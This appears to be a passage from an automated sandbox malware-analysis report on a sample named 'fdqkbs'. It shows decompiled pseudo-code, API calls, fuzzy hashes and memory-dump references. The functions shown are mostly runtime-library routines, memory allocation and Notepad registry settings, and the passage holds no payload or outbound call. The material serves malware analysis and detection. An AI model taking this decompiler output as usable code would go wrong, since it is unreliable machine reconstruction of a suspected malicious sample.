				E00405990(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E004058AF( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00402B6B( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00402DAB();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E004031B0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
						}
						 *((intOrPtr*)(E0040370A(_t41))) = 0x16;
						E004036B8();
						goto L6;
					}
				}
				return E004059D5(_t19);
			}

0x00402d27
0x00402d29
0x00402d2e
0x00402d35
0x00402d3b
0x00402d6c
0x00402d6c
0x00402d42
0x00402d45
0x00402d77
0x00402d7d
0x00402d8f
0x00402d97
0x00402d9a
0x00402da1
0x00402da6
0x00402d47
0x00402d47
0x00402d4b
0x00402d54
0x00402d59
0x00402d61
0x00402d67
0x00000000
0x00402d67
0x00402d45
0x00402d73

APIs

_memset.LIBCMT ref: 00402D54
__lock_file.LIBCMT ref: 00402D77

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
Instruction ID: 9e23bb097c87b2cb0c8b28cae3504dfd9644aeb73d234b4e03d6ed55913451c2
Opcode Fuzzy Hash: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
Instruction Fuzzy Hash: 92014071800219EBCF22AFA5C90989F7F30AF04765F10813BF914761E1C3798A62DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00402F66 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00402F66(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t17;
				void* _t26;
				intOrPtr _t28;

				_push(0xc);
				_push(0x411ff0);
				E00405990(__ebx, __edi, __esi);
				_t28 =  *((intOrPtr*)(_t26 + 8));
				_t29 = _t28 != 0;
				if(_t28 != 0) {
					E004058AF( *((intOrPtr*)(_t26 + 8)));
					_t5 = _t26 - 4;
					 *_t5 =  *(_t26 - 4) & 0x00000000;
					__eflags =  *_t5;
					_t15 = E00402DD2( *((intOrPtr*)(_t26 + 8))); // executed
					 *(_t26 - 0x1c) = _t15;
					 *(_t26 - 4) = 0xfffffffe;
					E00402FC1();
					_t17 =  *(_t26 - 0x1c);
				} else {
					 *((intOrPtr*)(E0040370A(_t29))) = 0x16;
					_t17 = E004036B8() | 0xffffffff;
				}
				return E004059D5(_t17);
			}

0x00402f66
0x00402f68
0x00402f6d
0x00402f74
0x00402f7a
0x00402f7c
0x00402f96
0x00402f9c
0x00402f9c
0x00402f9c
0x00402fa3
0x00402fa9
0x00402fac
0x00402fb3
0x00402fb8
0x00402f7e
0x00402f83
0x00402f8e
0x00402f8e
0x00402fc0

APIs

__lock_file.LIBCMT ref: 00402F96
__ftell_nolock.LIBCMT ref: 00402FA3

Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
Instruction ID: 8b2200138f54d187428e708a17617e132bb05bf2f3e2a31370f94ea22eeb7263
Opcode Fuzzy Hash: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
Instruction Fuzzy Hash: 51F03771410606EADB117F75C90675E7B70AF00379F20857BF414BA1D1CBBC45919A19

Uniqueness

Uniqueness Score: -1.00%

Function 0040C55D Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040C55D(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x415a64, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x415f58;
					if( *0x415f58 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E0040B343(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E0040370A(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0040c562
0x0040c567
0x0040c584
0x0040c589
0x0040c58b
0x0040c58d
0x0040c58f
0x0040c58f
0x0040c58f
0x00000000
0x0040c597
0x0040c5a0
0x0040c5a6
0x0040c5a8
0x00000000
0x00000000
0x0040c5dc
0x0040c5de
0x00000000
0x0040c5aa
0x0040c5aa
0x0040c5b1
0x0040c5cf
0x0040c5d2
0x0040c5d4
0x0040c5d6
0x0040c5d6
0x0040c5b3
0x0040c5b4
0x0040c5ba
0x0040c5bc
0x0040c590
0x0040c590
0x0040c592
0x0040c595
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c5be
0x0040c5be
0x0040c5c1
0x0040c5c3
0x0040c5c5
0x0040c5c5
0x0040c5cb
0x0040c5cb
0x0040c5bc
0x00000000
0x0040c569
0x0040c56d
0x0040c570
0x0040c573
0x00000000
0x0040c575
0x0040c57a
0x0040c583
0x0040c583
0x0040c573
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,004029D6,00000000,?,00408C55,00000000,004029D6,00000000,00000000,00000000,?,0040725B,00000001,00000214,?,004033DA), ref: 0040C5A0

Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
Instruction ID: 3453bd4832c175796419321ec01136e88b743f7a930f2e637f01305e36202e16
Opcode Fuzzy Hash: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
Instruction Fuzzy Hash: 88019239201225EEEB249F65DC94BA73795AB85360F108B3AE815AB2D0DB38E901C658

Uniqueness

Uniqueness Score: -1.00%

Function 00480F1D Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00480EBF: GetSystemInfo.KERNELBASE(?), ref: 00480EDC

VirtualAllocExNuma.KERNELBASE(00000000), ref: 00480F82

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: AllocInfoNumaSystemVirtual
String ID:
API String ID: 449148690-0
Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
Instruction ID: 0e86de2588e11a1b15a8184666640b049d590f591f7b243c56cd6dfd8b8fec84
Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
Instruction Fuzzy Hash: CFF0F470D64309BAEBB07BF2580776D76689F01309F108D5AB744762C3DABD9608476D

Uniqueness

Uniqueness Score: -1.00%

Function 0040318F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040318F(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E004030D1(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x00403194
0x00403196
0x00403199
0x0040319c
0x004031a5

APIs

__wfsopen.LIBCMT ref: 0040319C

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 2ced2bfb3f9d4ac77b3096636764d60d89a48be8f4a51fc1c3532829defdef63
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 26C0927254020C77DF112E83EC02E4A3F5E9BC0774F448021FB1C291A5AA77EAA19689

Uniqueness

Uniqueness Score: -1.00%

Function 004070F9 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,0040B4CB,00415220,00000314,00000000,?,?,?,?,?,00406B3A,00415220,Microsoft Visual C++ Runtime Library,00012010), ref: 004070FB

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
Instruction ID: 45c9fe6625449defc2d77b84375a10b8a7ee1ea61be3005a2c3dbae11cbcc7d8
Opcode Fuzzy Hash: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00480E1F Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00480E5C

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
Instruction ID: bcd0f4e5bf464c75245518bed374840f1af04c07023b6741f5c7002380603ca9
Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
Instruction Fuzzy Hash: A0113A70D10208EFDB40EBA8DC4ABAEBBB4AB05304F208896E550B7251D3754A44CB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040800D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040800D(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x414570; // 0x158f8049
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x415d28 = _t6;
				 *0x415d24 = _t22;
				 *0x415d20 = _t25;
				 *0x415d1c = _t21;
				 *0x415d18 = _t27;
				 *0x415d14 = _t26;
				 *0x415d40 = ss;
				 *0x415d34 = cs;
				 *0x415d10 = ds;
				 *0x415d0c = es;
				 *0x415d08 = fs;
				 *0x415d04 = gs;
				asm("pushfd");
				_pop( *0x415d38);
				 *0x415d2c =  *_t31;
				 *0x415d30 = _v0;
				 *0x415d3c =  &_a4;
				 *0x415c78 = 0x10001;
				_t11 =  *0x415d30; // 0x0
				 *0x415c2c = _t11;
				 *0x415c20 = 0xc0000409;
				 *0x415c24 = 1;
				_t12 =  *0x414570; // 0x158f8049
				_v812 = _t12;
				_t13 =  *0x414574; // 0xea707fb6
				_v808 = _t13;
				 *0x415c70 = IsDebuggerPresent();
				_push(1);
				E00408005(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(" \\A");
				if( *0x415c70 == 0) {
					_push(1);
					E00408005(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040800d
0x0040800d
0x0040800d
0x0040800d
0x0040800d
0x0040800d
0x0040800d
0x00408013
0x00408015
0x00408015
0x0040b896
0x0040b89b
0x0040b8a1
0x0040b8a7
0x0040b8ad
0x0040b8b3
0x0040b8b9
0x0040b8c0
0x0040b8c7
0x0040b8ce
0x0040b8d5
0x0040b8dc
0x0040b8e3
0x0040b8e4
0x0040b8ed
0x0040b8f5
0x0040b8fd
0x0040b908
0x0040b912
0x0040b917
0x0040b91c
0x0040b926
0x0040b930
0x0040b935
0x0040b93b
0x0040b940
0x0040b94c
0x0040b951
0x0040b953
0x0040b95b
0x0040b966
0x0040b973
0x0040b975
0x0040b977
0x0040b97c
0x0040b990

APIs

IsDebuggerPresent.KERNEL32 ref: 0040B946
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B95B
UnhandledExceptionFilter.KERNEL32( \A), ref: 0040B966
GetCurrentProcess.KERNEL32(C0000409), ref: 0040B982
TerminateProcess.KERNEL32(00000000), ref: 0040B989

Strings

\A, xrefs: 0040B961

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: \A
API String ID: 2579439406-3503946924
Opcode ID: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
Instruction ID: 85da8a808e4b98403950fcee6e72ddd3236f317be0e167dc40347674819b260b
Opcode Fuzzy Hash: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
Instruction Fuzzy Hash: 5B219EB8811B04EBD740DF65FD896C43BB4BB88315F50C53AE9099A260EBB959818F8D

Uniqueness

Uniqueness Score: -1.00%

Function 004066DE Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066DE() {

				SetUnhandledExceptionFilter(E0040669C);
				return 0;
			}

0x004066e3
0x004066eb

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000669C), ref: 004066E3

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
Instruction ID: 84f951258dbbba53fa59dbd9b439672c707fbbd9d41bbe323b106ac1153b7929
Opcode Fuzzy Hash: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
Instruction Fuzzy Hash: 5B9002A425114456C6101B715D1954965946A49712B528871A442DC094DABB50509A29

Uniqueness

Uniqueness Score: -1.00%

Function 0048017B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction ID: 2766dd5a029832b7d37e3fb9707a1deac6e2cbf9e2181f6b93dfe521557bb84f
Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction Fuzzy Hash: CF11C236620119AFC7A0FF69C8849AEB7E9EF147A47048416FC54CB310E339ED85C758

Uniqueness

Uniqueness Score: -1.00%

Function 0048013E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction ID: 52925d0b358a7acd3f541616a416249af7f279ebcd0f59705efdf9c39566a97c
Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction Fuzzy Hash: 5EE09A35264148EFCB80DBA8CC85D29B3F8EB09330B144691F825C73A0E739EE00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00480109 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction ID: 8591dccd857a49fd4573a6170e8979aa6d8bf850ad78c6707efc41181d889be7
Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction Fuzzy Hash: DBE048322206149BC7A1AB59C844D5BF7E8EF44770B454826ED4597611C335FC05C794

Uniqueness

Uniqueness Score: -1.00%

Function 0048005F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 004011CB Relevance: 103.6, APIs: 32, Strings: 27, Instructions: 303
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004011CB(signed int __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				void* _v36;
				struct _WINDOWPLACEMENT _v64;
				long _t78;
				char _t81;
				char _t84;
				char _t87;
				intOrPtr _t90;
				intOrPtr _t94;
				char _t104;
				char _t110;
				char _t128;
				char _t143;
				int _t146;
				signed int _t147;
				signed int _t164;
				int _t167;

				_t164 = __edx;
				_t78 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
				if(_t78 == 0) {
					_v64.length = 0x2c;
					GetWindowPlacement( *0x415f64,  &_v64);
					_t81 =  *0x415fdc; // 0x0
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t167 = 4;
					_v12 = _t81;
					RegSetValueExW(_v8, L"fWrap", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t84 =  *0x4151c4; // 0x0
					_v12 = _t84;
					RegSetValueExW(_v8, L"iWindowPosX", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t87 =  *0x4151c8; // 0x0
					_v12 = _t87;
					RegSetValueExW(_v8, L"iWindowPosY", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t90 =  *0x4151cc; // 0x0
					_v12 = _t90 -  *0x4151c4;
					RegSetValueExW(_v8, L"iWindowPosDX", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t94 =  *0x4151d0; // 0x0
					_v12 = _t94 -  *0x4151c8;
					RegSetValueExW(_v8, L"iWindowPosDY", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f97 & 0x000000ff;
					RegSetValueExW(_v8, L"lfCharSet", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f99 & 0x000000ff;
					RegSetValueExW(_v8, L"lfClipPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t104 =  *0x415f88; // 0x0
					_v12 = _t104;
					RegSetValueExW(_v8, L"lfEscapement", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f94 & 0x000000ff;
					RegSetValueExW(_v8, L"lfItalic", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t110 =  *0x415f8c; // 0x0
					_v12 = _t110;
					RegSetValueExW(_v8, L"lfOrientation", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f98 & 0x000000ff;
					RegSetValueExW(_v8, L"lfOutPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f9b & 0x000000ff;
					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f9a & 0x000000ff;
					RegSetValueExW(_v8, L"lfQuality", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f96 & 0x000000ff;
					RegSetValueExW(_v8, L"lfStrikeOut", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x415f95 & 0x000000ff;
					RegSetValueExW(_v8, L"lfUnderline", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t128 =  *0x415f90; // 0x0
					_v12 = _t128;
					RegSetValueExW(_v8, L"lfWeight", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x416cd0;
					RegSetValueExW(_v8, L"iMarginTop", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x416cd4;
					RegSetValueExW(_v8, L"iMarginBottom", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x416cd8;
					RegSetValueExW(_v8, L"iMarginLeft", 0, 0x4151c4,  &_v12, 0x4151c4);
					_v12 =  *0x416cdc;
					RegSetValueExW(_v8, L"iMarginRight", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t143 =  *0x415f78; // 0x0
					_v12 = _t143;
					RegSetValueExW(_v8, L"bStatusBar", 0, 0x4151c4,  &_v12, 0x4151c4);
					_t146 = E00401051();
					_t147 =  *0x415f80; // 0x0
					asm("cdq");
					_v16 = MulDiv((_t147 ^ _t164) - _t164, 0x2d0, _t146);
					RegSetValueExW(_v8, L"iPointSize", 0, _t167,  &_v16, 0x4151c4);
					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x415f9c, lstrlenW(0x415f9c) + _t153);
					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x416ce0, lstrlenW(0x416ce0) + _t156);
					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x416ee8, lstrlenW(0x416ee8) + _t159);
					return RegCloseKey(_v8);
				}
				return _t78;
			}

0x004011cb
0x004011ef
0x004011f7
0x00401209
0x00401210
0x00401216
0x00401223
0x00401224
0x00401225
0x00401228
0x0040122f
0x00401231
0x00401242
0x00401244
0x0040124a
0x0040125b
0x0040125d
0x00401263
0x00401274
0x00401276
0x00401282
0x00401293
0x00401295
0x004012a1
0x004012b2
0x004012bc
0x004012cd
0x004012d6
0x004012e8
0x004012ea
0x004012f0
0x00401301
0x0040130b
0x0040131c
0x0040131e
0x00401324
0x00401335
0x0040133f
0x00401350
0x0040135a
0x0040136b
0x00401375
0x00401386
0x00401390
0x004013a1
0x004013aa
0x004013bc
0x004013be
0x004013c4
0x004013d5
0x004013dd
0x004013ee
0x004013f6
0x00401407
0x0040140f
0x00401420
0x00401428
0x00401439
0x0040143b
0x00401441
0x00401452
0x00401454
0x0040145a
0x0040145f
0x00401471
0x00401482
0x004014a4
0x004014c0
0x004014dc
0x00000000
0x004014e8
0x004014eb

APIs

RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004011EF
GetWindowPlacement.USER32(?), ref: 00401210
RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00401242
RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0040125B
RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 00401274
RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00401293
RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 004012B2
RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 004012CD
RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 004012E8
RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00401301
